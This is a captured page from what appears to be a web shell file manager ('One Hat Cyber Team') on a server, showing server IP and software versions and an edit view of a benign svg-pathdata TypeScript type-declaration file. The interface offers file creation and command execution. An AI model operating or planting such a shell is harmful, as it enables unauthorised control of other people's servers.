⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.7
Server IP:
185.238.29.86
Server:
Linux server2 6.8.12-6-pve #1 SMP PREEMPT_DYNAMIC PMX 6.8.12-6 (2024-12-19T19:05Z) x86_64
Server Software:
nginx/1.18.0
PHP Version:
8.1.31
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
invoice
/
node_modules
/
svg-pathdata
/
lib
/
Edit File: types.d.ts
import { SVGPathData } from "./SVGPathData"; export declare type CommandM = { relative: boolean; type: typeof SVGPathData.MOVE_TO; x: number; y: number; }; export declare type CommandL = { relative: boolean; type: typeof SVGPathData.LINE_TO; x: number; y: number; }; export declare type CommandH = { relative: boolean; type: typeof SVGPathData.HORIZ_LINE_TO; x: number; }; export declare type CommandV = { relative: boolean; type: typeof SVGPathData.VERT_LINE_TO; y: number; }; export declare type CommandZ = { type: typeof SVGPathData.CLOSE_PATH; }; export declare type CommandQ = { relative: boolean; type: typeof SVGPathData.QUAD_TO; x1: number; y1: number; x: number; y: number; }; export declare type CommandT = { relative: boolean; type: typeof SVGPathData.SMOOTH_QUAD_TO; x: number; y: number; }; export declare type CommandC = { relative: boolean; type: typeof SVGPathData.CURVE_TO; x1: number; y1: number; x2: number; y2: number; x: number; y: number; }; export declare type CommandS = { relative: boolean; type: typeof SVGPathData.SMOOTH_CURVE_TO; x2: number; y2: number; x: number; y: number; }; export declare type CommandA = { relative: boolean; type: typeof SVGPathData.ARC; rX: number; rY: number; xRot: number; sweepFlag: 0 | 1; lArcFlag: 0 | 1; x: number; y: number; cX?: number; cY?: number; phi1?: number; phi2?: number; }; export declare type SVGCommand = CommandM | CommandL | CommandH | CommandV | CommandZ | CommandQ | CommandT | CommandC | CommandS | CommandA; export declare type TransformFunction = (input: SVGCommand) => SVGCommand | SVGCommand[];
Simpan